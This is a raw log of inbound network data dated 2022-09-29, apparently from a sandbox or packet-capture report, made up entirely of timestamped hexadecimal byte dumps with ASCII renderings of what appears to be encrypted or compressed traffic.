                                                                                                                                                2022-09-29 12:49:27 UTC6466INData Raw: 69 08 d7 e4 95 66 80 d6 ca 5c 99 da 6f 02 a7 67 0e b2 24 54 29 e1 13 c6 60 fe 9f 8d 54 ed 57 77 8a 95 0b cb b8 c4 82 af bf ec 0a 17 6d b0 3e 19 9c 0b 0f 46 ce ba 86 3c 28 d0 11 e7 10 55 ba e8 ea 1e 45 3e 2f 4a 2e 6f 14 72 2e 33 08 47 8c ed a7 9b a2 86 74 ec ec 9e 8c fc a7 d9 d8 a3 31 12 37 e0 16 c1 1d 36 bd cf 12 50 99 36 05 42 69 bb 5d 29 38 27 21 2c d9 f4 38 e5 05 68 c0 68 17 cc 04 da 55 a4 42 78 f8 d5 71 1b f6 28 9b 23 2f aa 37 7c f4 9f 20 24 39 1b d5 fa a0 3f 23 09 70 50 36 92 7a 8a 26 8e 3a d6 94 c8 e8 83 62 2d 06 af 71 5c 48 1d 13 59 cd e6 37 31 72 6c 27 e7 43 d1 8b f0 03 0b ce 64 52 e7 86 36 00 46 74 60 8c 38 f4 f8 f5 8b e9 53 54 f0 c7 a3 84 64 5d b0 27 b6 70 b6 7a 7d b0 b6 e7 52 97 c9 29 20 ab 22 74 8e 0e ce 38 a6 38 5e 1f 57 71 d3 e5 aa ca fb e4
                                                                                                                                                Data Ascii: if\og$T)`TWwm>F<(UE>/J.or.3Gt176P6Bi])8'!,8hhUBxq(#/7| $9?#pP6z&:b-q\HY71rl'CdR6Ft`8STd]'pz}R) "t88^Wq
                                                                                                                                                2022-09-29 12:49:27 UTC6482INData Raw: 9c 8d b9 c8 33 bd 0f 68 fe ef 8a f5 88 59 6d a2 28 47 f5 8e ae e2 4c 53 bb cc d1 70 df e1 ff f6 5a 83 95 e2 7c a2 bf d1 59 fd 39 89 20 20 ec d9 8e d4 b3 11 c2 c3 28 dc 50 45 2e 00 fe ae 87 73 03 94 42 20 ec e8 ba ef 16 98 b9 f7 de 03 03 0f 4f c9 3c 08 ef 24 e0 b0 ce 14 d8 f7 ce 9f 2e f6 db 82 dd 6e f3 77 03 35 f8 84 e3 c7 36 8e 7a ef e7 fc 16 87 b7 c8 1f 85 91 0b 05 b8 44 93 36 d0 33 8d 05 6c 18 26 19 06 ae a7 7f 09 45 fe cb 13 50 8c f9 7e 98 29 36 20 19 9c 45 a0 6b ff b3 6e 9a d1 65 d4 4f 63 87 70 8c 5c a4 6c cf 09 49 47 71 0d d1 69 cd 65 40 dc 35 03 df c2 36 cd d4 ba 98 95 8e 35 ff be 37 40 d3 08 d4 46 95 63 aa db a1 24 49 0d b0 0c 0d 11 9e 88 2b dd 0e ec f0 59 85 6b 91 6b a8 41 8e a7 63 d1 49 99 b6 82 2b ca 57 3d 0b 21 0a 94 7c 15 cc 3d f6 f6 e4 bc af
                                                                                                                                                Data Ascii: 3hYm(GLSpZ|Y9 (PE.sB O<$.nw56zD63l&EP~)6 EkneOcp\lIGqie@5657@Fc$I+YkkAcI+W=!|=
                                                                                                                                                2022-09-29 12:49:27 UTC6498INData Raw: ec e0 62 e0 77 d9 cb bc fc 42 49 89 aa 9c 5a 04 8d 9b a5 4c 7a 58 15 43 04 cd 34 c8 51 3f e5 3f f2 ca 12 6f 87 27 9f 30 d2 e2 64 4b 0e fd 01 3d dc 8a 75 37 c4 82 cc 87 f8 cb aa 03 18 f3 94 f5 fc 12 bf 9c e7 39 ba 5c 83 b0 83 8c 61 e8 b2 c4 6e ec 44 7f 5e 3b 1f 4c 58 6f 47 da 7d a5 b6 fe 4a 55 83 da 12 5d d2 9b 9c 60 a8 28 c7 c4 80 0d bc 58 19 e5 7a 55 f2 64 75 59 25 56 30 bd 35 8b 52 a5 78 54 82 99 80 3f 02 32 dd 86 ea e0 b5 78 87 70 38 70 71 b8 54 9c 84 06 84 08 37 7c 79 5f 56 ed 91 57 10 27 cc ba 40 60 7d d3 69 25 9a 9f bf 84 70 27 8e e0 b0 fd 82 c1 b9 05 62 ad 5e ce 9b 32 45 e2 11 5a 8e e3 43 25 3d f9 d7 60 38 0f b7 5b b3 bb 60 0c 94 0f 18 e6 d2 bb bb 58 e4 03 13 ec 9c 30 3c fc 8f b5 ea 87 8e 71 62 0e 79 43 70 61 c7 66 c3 e6 3d 43 2b 33 47 ab c6 23 6b
                                                                                                                                                Data Ascii: bwBIZLzXC4Q??o'0dK=u79\anD^;LXoG}JU]`(XzUduY%V05RxT?2xp8pqT7|y_VW'@`}i%p'b^2EZC%=`8[`X0<qbyCpaf=C+3G#k
                                                                                                                                                2022-09-29 12:49:27 UTC6514INData Raw: c2 c8 84 2b 07 5c 1f 20 e3 79 95 10 57 1b ca d8 59 eb c2 57 00 51 02 7d 15 26 75 34 94 83 4b 9c b3 93 39 42 58 91 07 9b 0d a4 59 5d 27 49 13 1d 68 99 bc 7d 51 d8 08 23 f7 59 32 a0 ad 5f d1 f1 f0 b5 d8 a9 59 28 34 82 33 b9 71 59 19 70 d8 10 94 84 ba 3c d1 ad 49 16 f2 99 68 89 b7 1e 03 b5 7b 4f 61 c5 96 08 e7 b8 80 63 75 d1 9e 96 08 d4 9c 5f c2 39 cd f4 e5 9e 72 71 83 2e 15 f6 72 85 36 c6 fc 8c 5a 2d b3 6b 23 39 fa 82 2d 9e e7 71 1f b2 e6 5f 18 94 61 e3 a0 85 c3 81 09 36 d2 8b a7 05 f6 b9 84 83 2c 22 05 bb 2a 40 ea ec 7c ca ad 94 4b ec 3d 1b 9c 47 9c 41 14 98 b8 e4 c7 05 94 ba 43 c6 81 28 fa aa 00 63 88 64 f2 eb 9c 34 46 d3 1a fe a7 a3 a7 d9 89 33 f2 25 bc 54 b2 82 67 0a e8 b8 e3 d1 c5 21 7f b8 d6 11 45 f4 3c d9 9f e8 20 de 83 c9 d3 6a 82 84 68 c8 29 f5 b8
                                                                                                                                                Data Ascii: +\ yWYWQ}&u4K9BXY]'Ih}Q#Y2_Y(43qYp<Ih{Oacu_9rq.r6Z-k#9-q_a6,"*@|K=GAC(cd4F3%Tg!E< jh)
                                                                                                                                                2022-09-29 12:49:27 UTC6530INData Raw: 21 80 95 b2 6c ce fc 88 7d d1 6e ba de df 1d 09 6c fa 03 5c 55 c8 97 93 28 4b 05 fc a1 08 52 95 ef 53 fe 63 97 16 17 75 5c 31 b4 8c d4 08 a6 21 20 1c b0 93 e3 ec 5e 56 55 7b 13 6d e4 ff 49 90 9d f8 9f 83 dd 24 da 63 da 53 60 10 b1 62 66 ec 09 2d 12 92 1d 72 e3 88 0f 14 f0 8e 09 59 95 24 f8 8e 2c 4e 34 6d 7a 4c 5e 79 0f 41 af ab 81 01 0a 4c 8e 22 b9 19 09 09 cd 0a c1 04 39 4e 8c b4 5b df 0e ec 97 2c 0e 12 14 08 d6 45 f6 1a 3c 8c 9f 95 f1 97 75 7b b4 81 8e 13 b2 74 8a 57 1b fe 15 85 91 bc d5 74 9d 32 87 df 52 06 36 4f 96 3f 77 56 dc b2 e2 c6 19 26 9a ff 37 07 1b 8e 69 fa bc 22 a9 ad ed 84 5e c9 c3 63 6c 97 dc d6 ad e0 67 8f 02 3d f2 ef 64 3f 9f 4f 31 df 90 a7 23 17 aa ee 9d 96 38 01 25 65 3c 9c 99 ac 8b 29 82 13 31 5f 25 48 23 3e da df 0f 7e ea 7f 61 81 24
                                                                                                                                                Data Ascii: !l}nl\U(KRScu\1! ^VU{mI$cS`bf-rY$,N4mzL^yAL"9N[,E<u{tWt2R6O?wV&7i"^clg=d?O1#8%e<)1_%H#>~a$
                                                                                                                                                2022-09-29 12:49:27 UTC6546INData Raw: 83 54 b3 51 ea b6 84 7a 6c 70 35 17 b0 7e 02 67 57 17 09 6a 46 1f d8 cf c8 dc f5 8d b9 a8 90 2c 66 51 e9 e3 c3 3f e0 7c 18 f5 d5 4f 95 ac fd dd 4c 78 bf ec e4 0d fa 7e 49 36 f1 55 c3 88 71 82 04 4a 72 df 5b d4 23 84 36 f6 ff c5 ad 26 4b 00 04 70 1b 3b 76 42 4a e4 76 f8 d0 97 dc 4d da d9 48 60 92 06 6b 40 18 ba 6f 9b eb 01 b4 f2 a2 57 ba 98 e2 f0 9d f8 e0 42 20 5c 0a a9 c9 ab 39 88 73 33 ab cf 96 44 bb dc 2a 79 00 5e 0f f9 fa 11 03 1e 99 9c f9 e0 e6 2a e1 b0 dc 2d b2 31 68 7a 06 a6 92 d1 a2 bb f1 cf 48 ab 65 60 7a cb 43 b7 a1 ab 35 e5 86 cf 9f 23 0b 40 43 f3 85 b3 02 ba a2 2f dd b5 2f c2 c1 7a 04 e6 d4 ed 27 43 8b ca 1b 61 e5 d5 26 8b 3a a9 17 cf 31 59 21 f6 04 59 27 fb 3f db 32 df b0 8c ce e2 a8 c8 07 29 12 d1 14 06 55 af e0 3b 7b 8e c7 36 63 09 83 80 ac
                                                                                                                                                Data Ascii: TQzlp5~gWjF,fQ?|OLx~I6UqJr[#6&Kp;vBJvMH`k@oWB \9s3D*y^*-1hzHe`zC5#@C//z'Ca&:1Y!Y'?2)U;{6c
                                                                                                                                                2022-09-29 12:49:27 UTC6562INData Raw: c9 62 d4 74 2f a3 88 5c 6e a0 c6 28 1d f3 b4 50 d3 f1 56 95 42 1b 80 47 4c 35 66 3f 5d 92 7c 30 05 3e 0e 22 a6 eb a3 e8 1a d7 a2 91 1f d5 6b 18 50 b7 44 8c d5 24 7a a7 d0 4b 18 59 0d 62 5d 41 eb 5f 16 49 35 de 93 56 6b 67 57 2c ed 47 f9 ca ce c8 d2 36 57 11 9f c2 06 c0 cd 0f 81 c6 76 bc e6 d4 fc b1 e4 76 bb e2 8f 2f db ce db c8 f1 d6 83 72 cc d1 57 3f b7 52 68 cd 2f 82 89 15 b1 16 6a 49 31 9c b2 ea 79 6b 33 2e ff e6 0e e4 7a d4 74 cd 08 36 f3 d4 9b 63 cf f3 56 08 57 05 82 0c a2 47 97 93 a0 e2 39 8b 8a 87 c1 a6 41 01 4f 1e b7 0a 51 a7 dd 46 7e 3b 0d 53 b9 82 41 09 2a 42 fc b0 bc da 06 92 fc 9e 70 8f 2b a2 fa 1e d5 dd 61 76 35 d6 61 a0 8d 8b 0b 6c d7 d1 8a 19 16 3b 1a 35 66 95 6d 49 eb 4b 9b 6a 6b 33 8d c9 84 65 43 79 1b e4 05 c0 7f 03 94 61 c3 0d e6 48 2c
                                                                                                                                                Data Ascii: bt/\n(PVBGL5f?]|0>"kPD$zKYb]A_I5VkgW,G6Wvv/rW?Rh/jI1yk3.zt6cVWG9AOQF~;SA*Bp+av5al;5fmIKjk3eCyaH,
                                                                                                                                                2022-09-29 12:49:27 UTC6578INData Raw: 03 c0 cf 98 9d 91 c7 d6 1b f7 7b 3b 2b 30 ad 14 d3 80 9d 84 00 c8 84 cf 6a 82 5a d3 72 fd 8d e9 ca 1f 07 de 28 93 71 5f 88 4e e4 5d 21 b0 6a 23 1f 53 07 c3 26 fd c5 83 96 6f ba b9 aa f3 a7 45 16 93 ff ae 61 3e 27 07 33 4b 48 cb 96 0e 05 68 51 bb 85 e4 7b 7a ce b7 3e 38 af 5d ef 8f 4a f3 28 08 cc 92 bd 00 9a 6b 22 9f 37 f6 b5 16 be 13 d2 5f 51 e2 2a 06 80 f8 82 e6 a0 b8 55 6e 03 34 2a 03 cc 4d c9 3f 15 43 e6 d6 d3 09 a9 a1 8c ce 68 6d db de 1d 4e f8 51 0d 92 33 37 5e 8e c0 10 f9 60 49 01 12 6d a1 e9 0a 80 93 ff a2 c3 25 53 65 50 e1 d6 ac d2 37 36 1f a0 91 37 11 2b 86 43 7c 0e 8a 0e b4 a2 33 84 94 88 45 76 53 9c e8 13 53 0d 23 4d 88 60 e8 bf 0e 2f 73 b2 79 e3 01 7e fa 3d f4 60 be 01 92 c2 35 39 6b f2 52 e0 21 99 bb 76 a9 23 dd be a9 f2 b6 82 8d f6 ef 14 d9
                                                                                                                                                Data Ascii: {;+0jZr(q_N]!j#S&oEa>'3KHhQ{z>8]J(k"7_Q*Un4*M?ChmNQ37^`Im%SeP767+C|3EvSS#M`/sy~=`59kR!v#
                                                                                                                                                2022-09-29 12:49:27 UTC6588INData Raw: 4b 56 ef 5b 11 ad d1 ba 79 a4 12 f1 ef b8 46 93 1c 23 dc fb 6e cc 62 28 88 e7 e1 4e a2 9e 68 1f 0b b4 a3 2d 6b b9 08 8c dd c8 b2 d8 95 cd 34 b8 1a a7 56 2b e1 f4 38 23 14 5b fe ef ca 5e 6b 72 5c 83 70 04 be 15 61 74 f9 df 5c 93 b1 42 ee 1c 6c db 7f 20 34 6e f1 94 77 99 92 78 7b 84 75 67 e4 69 94 8a 65 e1 31 6a 0d 8c 7f bf 22 cb 80 26 b2 ac 1e 21 de d0 d9 6f db 33 f7 b0 7c 26 61 9d 24 3d ef 5a c1 7f 0a 2b a3 b3 16 7c 05 e8 1a 37 8c b1 af d9 82 9b 37 00 18 c3 d7 37 03 05 17 dc f4 f0 51 0a 20 47 ea 8e 5f ac 3d d4 91 26 04 0e 66 0e e4 31 f7 56 61 65 c9 36 b9 88 c8 fa b5 33 10 1a 1e 4e 8e 15 da 90 3a 38 71 65 19 21 e6 e4 db 08 41 27 6b 89 a8 0c e0 45 7a 98 d6 bb b8 52 d8 b9 66 e6 7b d1 99 83 5a 31 6c cb 91 9d 44 7a 45 55 f4 3a 5c de b9 4f 8c bf 7d 7b 66 c2 f4
                                                                                                                                                Data Ascii: KV[yF#nb(Nh-k4V+8#[^kr\pat\Bl 4nwx{ugie1j"&!o3|&a$=Z+|777Q G_=&f1Vae63N:8qe!A'kEzRf{Z1lDzEU:\O}{f
                                                                                                                                                2022-09-29 12:49:27 UTC6604INData Raw: 83 6d 03 d7 7a 0d ec 25 0a 6d 89 cf fe 0a 4c 20 7d 28 0e 74 4a be c3 7c 28 4d c6 c1 3a fe fd a1 02 31 06 90 f8 3b 2b 61 ae a0 51 77 c6 1d 74 19 3e 34 cc 2d 72 48 ea ec 31 7d b4 ec 22 45 9d fb e2 bb c0 dd 0a 05 ce 80 61 81 0e a7 f2 63 71 16 ac 1b 93 92 c7 72 98 db 11 b8 5f 87 22 7c f3 2c 1e 46 7c dc 1c b3 2e a7 c8 28 da 72 1a be a0 d5 48 5c 6e df 81 4d 6f 14 7a 9d 58 79 5b 3e 1c c9 54 ee 58 9c 8d b7 fc 23 e3 4a a3 a9 8a da de 58 2b 63 a3 4c 7e bc 0c f3 6c ff 91 78 95 b6 e5 52 d2 14 af e2 6e 17 bb ff 46 c7 7b 43 b5 98 c1 a1 a9 7d 96 6f 3e 1d fa b5 90 3f 57 61 e4 c3 57 c5 42 03 db 59 57 f4 a9 0b 1a fb de eb 53 3b 67 c9 34 8f 94 8e cd e6 a7 f0 89 98 b2 48 ac 79 b5 db 14 61 78 3c f6 3d 08 18 a4 4e 88 6c 78 cf 92 ed 81 de 9c 1f a4 99 e0 e8 e3 36 9c be e5 e8 ee
                                                                                                                                                Data Ascii: mz%mL }(tJ|(M:1;+aQwt>4-rH1}"Eacqr_"|,F|.(rH\nMozXy[>TX#JX+cL~lxRnF{C}o>?WaWBYWS;g4Hyax<=Nlx6
                                                                                                                                                2022-09-29 12:49:27 UTC6620INData Raw: ff 96 6d f8 1f 15 8b 63 c7 4e d3 3f 00 99 c0 32 70 bf a5 41 a4 ba bc c4 8c eb fe a9 0c 9f b7 e4 78 52 c0 d8 a9 bc da 97 11 2a 81 4e 33 c7 84 a3 80 a0 35 4b 78 1e 35 52 91 9e fc e9 f5 08 8d 2c 4d 2c 66 2c 0d b2 ad b2 29 7f d8 3f 90 f6 61 81 09 80 31 c4 d2 21 20 07 20 72 22 bd 0f 26 af 08 04 99 fc 74 f2 65 1a f2 38 7a e3 90 20 ab 92 86 4a 18 5e c8 81 a0 b9 11 d2 7b 48 b6 14 14 e9 27 e4 94 53 88 91 da 53 20 7a 68 0f 06 97 3e 25 75 27 d3 c3 c7 53 39 2e c3 70 70 57 ab b6 7d 9b 88 c1 a6 55 3a 82 41 1e ed 06 d8 fa ab 2f c0 a5 fa d8 5a 55 13 39 04 0c 8d 9e 1d 13 36 df 1d 20 34 2a 1f 38 07 cf a6 dc 9a 42 47 f9 ac 20 09 cd d0 86 df 44 ba 16 bc 71 cb 1e 14 2a b6 64 3e dd bf 92 1b c4 3b c1 77 31 75 68 65 c3 f8 62 62 79 db b7 08 b3 84 25 11 1a 0d c6 87 2b 3a 24 68 33
                                                                                                                                                Data Ascii: mcN?2pAxR*N35Kx5R,M,f,)?a1! r"&te8z J^{H'SS zh>%u'S9.ppW}U:A/ZU96 4*8BG Dq*d>;w1uhebby%+:$h3
                                                                                                                                                2022-09-29 12:49:27 UTC6636INData Raw: 80 c0 71 ee ff d9 ab 9c 92 1b 72 af 72 bf 2f 80 9a 4d 0a e7 23 4e 3e b5 b9 4c ba f0 35 8f 53 c9 d1 37 d4 6c a4 9a 4d 2f e6 d5 55 52 5c 8d 04 88 6e f1 1b 86 83 8c 99 d2 bb ee 4e ef 71 fc 23 60 62 2d dc b7 ed af 1c e4 71 db 6e 47 99 3e 64 40 8a 50 07 e7 40 72 8a dc 76 96 23 75 99 78 1a f2 df e8 b8 71 41 43 7c c7 bb 4d 6d d1 c0 ba be ef 4f 16 a9 4a 53 78 1d 39 ba 90 1b 55 e5 0a 78 41 cf 30 30 e7 f9 f6 66 b3 b3 1f ac 9d 54 ad ff 63 78 91 f4 86 c0 c3 31 32 13 02 e7 25 0b 65 66 6e 70 fd f2 70 b0 ea b8 af 1c 7a fe bd ef 86 b6 a4 79 7d 85 c2 54 64 82 6c 6d 6b 4c 2d 60 c4 d7 bc 5d 5f 08 0e 75 57 b5 14 4b 8b 4b 0f f1 a9 47 e3 55 f2 85 a6 74 d0 36 49 8c 17 49 90 d5 08 db c4 81 d1 10 b7 fa cb cb e0 7a 96 de bf 46 3f ce 52 01 4f 3d a1 ee 1b 9c 05 68 dc cb 93 6d 5f f8
                                                                                                                                                Data Ascii: qrr/M#N>L5S7lM/UR\nNq#`b-qnG>d@P@rv#uxqAC|MmOJSx9UxA00fTcx12%efnppzy}TdlmkL-`]_uWKKGUt6IIzF?RO=hm_
                                                                                                                                                2022-09-29 12:49:27 UTC6652INData Raw: 68 b9 2b c2 a5 35 31 71 a9 65 27 30 d1 9d b5 ab 49 f7 4a 64 ac c8 9f f4 ca 23 7f 0d 3d 52 e7 03 3a ec 34 89 4b 15 f9 f3 71 15 35 f3 f2 43 d8 b1 48 29 4f 4a 25 c3 3e 41 10 08 fa 4f 3d d6 69 15 cf 41 30 aa 74 4b d1 01 d4 67 ab 2d 72 9d 0e 97 82 7a d5 27 88 b5 91 10 b2 fe 55 0b ce 5c f9 15 19 c7 c4 b9 a8 00 ab ea ed 78 38 d2 a7 52 80 71 c2 a6 3d 68 c9 12 06 e0 5b 6a 77 bf a0 4d 4e bb b4 ad a1 14 cd c7 36 09 e4 70 5b bf 0e fb 1c 38 3c 4f cb 69 80 aa 6a 5b 26 18 41 fb 15 d2 65 a2 80 03 65 17 74 34 4e 83 53 8e 6e df c3 76 f0 54 21 05 3c 7c 55 0b f3 ce 6c 60 26 30 36 1a 42 31 de f8 2e bb 14 85 80 c6 10 1e 4e df db 06 ec 3e 1f 47 6d d3 b6 a7 57 72 ee 96 2f f4 03 bf f3 4d d7 68 b2 65 8c 56 4a 3c 3e 70 e7 94 67 93 2f dd 48 c2 3b ad 0d 96 18 85 a0 85 36 44 4c 97 f8
                                                                                                                                                Data Ascii: h+51qe'0IJd#=R:4Kq5CH)OJ%>AO=iA0tKg-rz'U\x8Rq=h[jwMN6p[8<Oij[&Aeet4NSnvT!<|Ul`&06B1.N>GmWr/MheVJ<>pg/H;6DL
                                                                                                                                                2022-09-29 12:49:27 UTC6668INData Raw: 69 ca fb 71 94 df 4e 78 f0 01 da 06 c5 23 b4 e2 3c 5a 07 f0 74 91 60 a4 04 39 7a d1 9e a5 f6 15 df 35 3f 6f 4e b1 f3 6a 91 c4 e4 82 f4 75 4e 0a f7 0f 24 14 61 9b 27 31 32 87 c5 a2 92 cd ee d8 93 cf 05 c0 af b4 9a 41 29 a4 9d ed c2 ad 70 fe af dc 32 db 50 55 ad de 5a 1c cd 3f 4c bb 41 e4 c4 68 92 a9 0e b1 5c 56 e5 58 56 d6 a5 28 5b 79 f1 46 81 0c 3a 2d 9e e6 f9 f9 fe 2e 2a 43 3b dc 30 aa 39 ea f0 b8 7f 71 4c be 01 42 bf 58 1a 07 f9 37 fa 50 c3 da 02 f3 2a 98 f8 21 05 20 0e 51 0a 1b cf b6 6b 0e 49 45 b3 3d 02 14 01 03 f0 c7 b4 32 62 58 48 09 0e 24 e5 31 1f ac 8f b0 5f 79 7b 14 83 cd d9 3f f4 9b df 66 8e 52 1f a5 ff 2b 02 9b 93 ad 59 26 d9 5e d3 e6 45 79 34 e9 27 84 f4 04 b3 cd b4 50 6c 39 f1 69 e3 47 c9 9f 53 f7 c7 9c 3c 9c d4 7e 79 b4 12 01 c5 b7 1e a9 69
                                                                                                                                                Data Ascii: iqNx#<Zt`9z5?oNjuN$a'12A)p2PUZ?LAh\VXV([yF:-.*C;09qLBX7P*! QkIE=2bXH$1_y{?fR+Y&^Ey4'Pl9iGS<~yi
                                                                                                                                                2022-09-29 12:49:27 UTC6684INData Raw: 87 2f 75 da a2 96 28 fb 66 09 58 3b a8 58 48 4d 14 e1 63 9d 8f 97 4d b4 71 4a 44 8d ce 0a 2b 31 29 68 de 8b a7 9f 67 6d 7d 96 dc 66 28 4e e3 ae c4 36 fd 45 59 ac 86 34 78 5c db 49 b9 9a 3e cd 36 a0 81 19 c5 56 db 05 55 35 a0 9e 50 cc b7 7a f6 70 33 de ba 62 5c d3 94 c2 c2 4b 20 b5 71 ea 37 2b 88 ec 70 19 dc 9e 36 4f 4b 8a 80 8c 41 70 18 dd d7 17 cb e7 da be ac 1f f9 7a da b5 5b d2 6c a8 ab 51 1e 79 9a 32 65 21 e1 ab 70 37 9d fb 91 b5 67 26 bb 2a 7c 81 9c 4b 49 cf dd e2 d5 6b e6 90 91 1e 85 08 e2 77 2e 87 7a 72 9c 91 32 a5 05 9f 1b 62 fb 4b 6c dd a6 2b 09 9c d5 d7 23 f5 ce da d6 b8 1d 52 fd 1d 9a 3e 4d 27 09 5d f5 b1 ec 8d 04 bf 12 42 2d b7 64 66 be 38 cc d6 70 7e 8e dc b2 62 99 42 6f dd 57 ea f6 c6 ec 51 6c 78 68 c8 8e e7 35 4a a7 69 29 0f 87 c5 44 18 03
                                                                                                                                                Data Ascii: /u(fX;XHMcMqJD+1)hgm}f(N6EY4x\I>6VU5Pzp3b\K q7+p6OKApz[lQy2e!p7g&*|KIkw.zr2bKl+#R>M']B-df8p~bBoWQlxh5Ji)D
                                                                                                                                                2022-09-29 12:49:27 UTC6700INData Raw: d9 b5 8d 06 f0 17 8b 9b f1 cc 8c 41 fc 17 9f 68 a1 ee 88 ec e1 99 fe 1f fd d7 70 b2 d2 25 1f db 47 6d 01 56 d1 43 37 5e 48 fd ab 84 2a a9 77 8c 0a 23 51 ca 0f 25 38 2c 14 33 64 34 18 e6 e6 bc 49 fb 2a 52 84 98 16 27 45 6f dd e5 38 33 d7 5d fd 3d 89 7c bb 05 b7 bb 23 70 1d f8 9f d5 9f b0 8b 73 7a ba 88 4e ce c8 de 71 db ba 17 16 b7 f2 4d 52 e3 74 29 d3 7d 63 60 eb 91 d5 da 60 c8 6a e0 c0 68 9f 80 31 3e 40 ab e5 cb 1b bd 9f 4d f2 7e bc 16 17 46 c4 2d a8 0c 25 dc 3f 12 ed 43 14 0c 02 49 52 51 bb 48 e6 8b 89 2b 1b e4 d4 a8 f0 39 70 83 fb de 64 dd 52 d6 10 40 da 6f c7 f6 2a f0 c6 ba 12 2d be 69 09 f2 9b 09 77 e4 c3 ff fe 59 69 e6 47 98 1e 07 a0 9a 4c 28 30 7b 87 8c ce bd 38 eb b2 d4 b8 49 e4 a4 13 56 0f 3c 17 e5 71 cb 87 59 93 ca 53 f2 42 99 f9 f3 96 ab 43 a1
                                                                                                                                                Data Ascii: Ahp%GmVC7^H*w#Q%8,3d4I*R'Eo83]=|#pszNqMRt)}c``jh1>@M~F-%?CIRQH+9pdR@o*-iwYiGL(0{8IV<qYSBC
                                                                                                                                                2022-09-29 12:49:27 UTC6716INData Raw: 29 b6 1a a1 63 34 4c 24 aa 54 b0 3b 53 f3 e7 38 44 82 f5 3b 02 8a 4a c0 f9 85 6a 3c 3c d9 30 38 bf f6 53 7f c2 1e 5d 66 f7 39 cc 46 ee 44 fa bc 61 95 7f 8d 95 86 ce 27 49 f8 4a 6e ab 50 22 ee 66 bf 80 51 ff 02 29 94 b8 fb 31 29 53 95 7e 5c ff 12 84 10 96 36 5d f8 ad 1a 19 ad a9 a1 18 65 7e c1 e3 e1 f5 b5 c4 09 c2 37 69 70 79 3d a5 4f e8 6c d2 c2 75 c1 a2 8d 2a 7c d5 e6 80 38 85 e1 1e c5 18 83 d8 2c 13 ce 13 d5 52 37 65 fe 44 fb a5 51 c2 0f ea 61 e8 4a df 53 8f e1 7b 46 8a 50 82 bb 78 29 72 56 62 da f9 a2 e6 69 3d dd 76 5f bd 9b 38 97 1d c1 e3 1b c3 dd a3 dc 79 83 1a 3c a0 d6 c9 3a 35 3e c1 d4 0e bb 9a a3 b0 da 8d a3 90 13 ce 10 6d f1 13 18 f2 5a d7 1a 01 17 7e eb b3 9d 4d a7 2b 2c 7f 57 3b 11 fd 8d 83 ed fe 74 6b ca bd d7 30 e0 5b 9c a0 b1 22 9b 3f 51 ce
                                                                                                                                                Data Ascii: )c4L$T;S8D;Jj<<08S]f9FDa'IJnP"fQ)1)S~\6]e~7ipy=Olu*|8,R7eDQaJS{FPx)rVbi=v_8y<:5>mZ~M+,W;tk0["?Q
                                                                                                                                                2022-09-29 12:49:27 UTC6732INData Raw: ec e7 13 2d 19 af 87 cc 1b 8b 53 fc 79 3c 84 e5 f3 0b 09 d5 ee 85 70 be 2d 4c e3 89 72 9f 67 8f 82 c2 39 49 7c 6f 6e 25 2b c8 1d 8a a0 29 24 57 b2 f8 38 e4 58 09 2c 3c 98 0f 11 28 ec f6 74 77 30 25 87 1b f8 d2 1e 3b f3 ae f6 e6 64 a7 2f 5b fe 1d 42 5e 88 06 fa 00 28 71 76 f8 b6 44 bb 5f c2 e9 aa 61 b7 a4 e9 6e cb 49 3c d8 cb 1a 72 97 b2 32 70 06 41 39 d4 9a 27 be d5 11 c5 45 cf 69 01 02 47 51 ca 10 f0 f7 70 13 d5 a8 69 e7 3e f5 20 6a 9f 29 70 ce 74 fc 39 e9 5d c8 c9 4b 70 34 ba 80 58 6b 6e 59 2e 69 6a 24 be 9c 87 35 50 f6 82 0c 3a 27 d9 50 54 be 0a 3f a1 50 26 63 fa f7 0a 65 ff ab e3 01 2c a5 ab e5 14 e7 88 cf f6 c5 b5 87 04 32 79 72 3d 7d 7b e9 70 be a3 4e 77 c3 48 df 5c ad 7e ec 71 20 27 7a 8e 11 56 75 f6 2f f2 94 3f 6a 21 ab aa a3 1d 45 f2 88 24 6c 09
                                                                                                                                                Data Ascii: -Sy<p-Lrg9I|on%+)$W8X,<(tw0%;d/[B^(qvD_anI<r2pA9'EiGQpi> j)pt9]Kp4XknY.ij$5P:'PT?P&ce,2yr=}{pNwH\~q 'zVu/?j!E$l
                                                                                                                                                2022-09-29 12:49:27 UTC6748INData Raw: 0c 95 7d d2 37 ab 25 5e 43 4c 07 70 cb 46 8b d5 bc c5 fc 59 70 de 24 ea bd af 69 8b 9e f8 3d 81 e3 c7 c1 33 e0 23 2c 62 34 f4 3a d8 38 c0 0b 8e d1 37 3d 45 fc 0b 01 1f 4d 43 36 63 6c d1 dc 4e 56 04 2f 69 8c 12 59 03 70 e2 81 1f cb 54 d3 6c 10 af 08 c8 a4 03 62 e0 2e 54 6f a9 dd d7 95 74 4b 09 94 57 aa 1e d9 d4 68 dc a8 4b 2c 66 a4 92 3a 83 02 cf a3 f0 82 a4 17 cd 2c c1 3f 30 2d 7d 6d fc de b9 6c f3 7a cf d1 e2 88 98 eb e1 3e 09 46 78 d9 34 38 1a 06 07 01 1a 80 20 cb 8c 8b 4c dd 96 2e 2a b2 97 05 dc 5f 79 9a 6c aa 60 7e 58 5d 5f 0b e2 17 e1 f3 99 de fa d5 df 12 c1 18 76 ac 54 ae 48 6a 1b 86 25 a6 ec 01 aa b8 8a 80 14 a9 b2 75 67 e3 9c c0 5c 59 d5 c9 e4 e0 7a 87 fc 17 df 98 14 60 6e ef 9a 58 95 c6 9f 79 d5 d1 51 fe 2b c2 91 bb 5d 8e 9b 7d 99 f8 61 d2 a7 78
                                                                                                                                                Data Ascii: }7%^CLpFYp$i=3#,b4:87=EMC6clNV/iYpTlb.TotKWhK,f:,?0-}mlz>Fx48 L.*_yl`~X]_vTHj%ug\Yz`nXyQ+]}ax
